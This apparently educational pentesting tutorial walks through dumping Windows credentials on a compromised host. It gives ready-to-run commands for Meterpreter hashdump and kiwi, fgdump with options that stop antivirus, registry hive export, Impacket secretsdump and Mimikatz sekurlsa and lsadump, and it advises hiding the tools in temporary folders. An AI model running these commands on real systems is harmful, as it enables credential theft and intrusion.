This is to demonstrate different techniques to extract Windows users’ password. We need admin privileges to gather this information.

Metasploit

Hashdump

Having a meterpreter session we can execute the command “hashdump” to get the values of all saved passwords of windows users

  • sysinfo
  • hashdump

Load Mimikatz (kiwi) Meterpreter

  • load kiwi
  • help kiwi

This time we’d use “creds_all”, this will extract all saved credentials of local user account

post/windows/gather/hashdump

This module will dump the local user accounts from the SAM database using the registry

  • use post/windows/gather/hashdump
  • sessions -i
  • show info
  • set session 1
  • run

If we get “Access is denied” you may need to migrate to a process that is run by “NT AUTHORITY\SYSTEM”

  • sessions -i
  • sessions 1
  • ps
  • migrate <PID>
  • background
  • run

post/windows/gather/smart_hashdump

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

  • use post/windows/gather/smart_hashdump
  • show info
  • set session 1
  • run

windows/gather/credentials/credential_collector

This module harvests credentials found on the host and stores them in the database.

  • use post/windows/gather/credentials/credential_collector
  • show info
  • set session 1
  • run

fgdump

A Tool For Mass Password Auditing of Windows Systems (https://www.aldeid.com/wiki/FGDump)

Syntax

  • fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]

Options

  • -? = displays help (you’re looking at it!)
  • -t = will test for the presence of antivirus without actually running the password dumps
  • -c = skips the cache dump
  • -w = skips the password dump
  • -s = performs the protected storage dump
  • -r = forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.
  • -v = makes output more verbose. Use twice for greater effect
  • -k = keeps the pwdump/cachedump going even if antivirus is in an unknown state
  • -l = logs all output to logfile
  • -T = runs fgdump with the specified number of parallel threads
  • -h = is the name of the single host to perform the dumps against
  • -f = reads hosts from a line-separated file
  • -H = reads host:username:password from a line-separated file (per-host cr edentials)
  • -o = skips pwdump history dumps
  • -a = will not attempt to detect or stop antivirus, even if it is present
How to

1. Transfer it to the compromised machine. Via preferred method. I used “Upload” functionality from Meterpreter.

  • upload fgdump.exe

2. I copied the application into a separate folder, try to do it in tmp or any other hidden location

  • mkdir %temp%\results
  • copy fgdump.exe %temp%\results
  • cd %temp%\results
  • dir

3. Run the application, After a few seconds a file “127.0.0.1.pwdump” has been created

  • fgdump.exe
  • dir

4. You can read the content of the files by using more CMD command.

  • more 127.0.0.1.pwdump

Windows Editor Credentials (WCE)

Windows Credentials Editor (WCE) is a post-exploitation security tool that allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

WCE can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon.

WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7, 2008 and Windows 8.

WCE works by using DLL injection or by directly reading the Local Security Authority Subsystem (LSASS) process memory. This second method is more secure in terms of operating system stability, because code is not injected into a highly privileged process.

Download it from https://www.ampliasecurity.com/research/windows-credentials-editor/

1. Having a session as administrator/system you can transfer the tool to the target

2. Once the file is in the target you can execute it to extract the hashes

Dump hives from Registry and Impacket

1. Get a copy of the SYSTEM, SECURITY and SAM hives and download them back to your local system

  • reg.exe save hklm\sam c:\windows\temp\sam.save
  • reg.exe save hklm\security c:\windows\temp\security.save
  • reg.exe save hklm\system c:\windows\temp\system.save

2. Once the files are generated, transfer them to you Kali/Parrot machine. This time I used meterpreter to download the files (you can use any other method)

  • cd C:\Windows\temp
  • download c:\windows\temp\sam.save
  • download c:\windows\temp\security.save
  • download c:\windows\temp\system.save
Using Impacket to extract the content of these files

1. Download the application into your Linux machine

  • git clone https://github.com/SecureAuthCorp/impacket.git
  • pip install -r requirements.txt
  • pip3 install impacket
  • cd examples
  • python3 secretdump.py

2. Once you can run the application, point to the downloaded files using secretdump.py

  • python3 secretsdump.py -sam ~/Desktop/sam.save -security ~/Desktop/security.save -system ~/Desktop/system.save LOCAL

In-memory technique

The concept behind in-memory dump of SAM hashes it to inject a DLL into the LSASS system process or, generally speaking, parsing the memory for specific patterns and inspect these memory pages’ content. The former action can lead to a Blue Screen of Death (BSoD) condition following a crash of the LSASS process therefore this action is not recommended on production environments: prefer registry hive copy (regback.exe and reg.exe/regedit.exe) and Volume Shadow Copies techniques instead. Nevertheless, in some specific instances, the in-memory technique is required.

The most widely known standalone tool to dump SAM hashes is probably fgdump, the successor of pwdump6, both tools developed by the foofus team. The main advantage of fgdump over pwdump6 is that it works on Windows Vista and later versions. Although, I have seen them both failing under some circumstances. More reliable tools include pwdump7 from Andres Tarasco and the gsecdump from TrueSec. Both work on 32-bit and 64-bit systems across all versions of Windows. Although, the former cannot successfully dump users’ password hashes on domain controllers as it reads the SAM hashes from the registry rather than injecting into LSASS process. Despite not working on 64-bit systems, another popular and reliable tool is PWDumpX by Reed Arvin.

This has been got from (https://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html)

Mimikatz

Mimikatz is a powerful tool that can help with Windows exploitation. This time we will use some techniques to extract hashes. This tool is much powerful than that, but here we will just see a small process

1. First have the tool transferred to the victim machine using your preferred method. This time I used meterpreter “upload” functionality to save the file in %temp%

  • upload /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe

2. Now access the location where you stored the file

  • cd %temp%
  • pwd
  • mimikatz.exe

3. First elevate privileges

  • privilege::debug
  • token::elevate

4. Get LSA

  • sekurlsa::logonPasswords

5. We could also get the files from SAM (registry)

  • lsadump::sam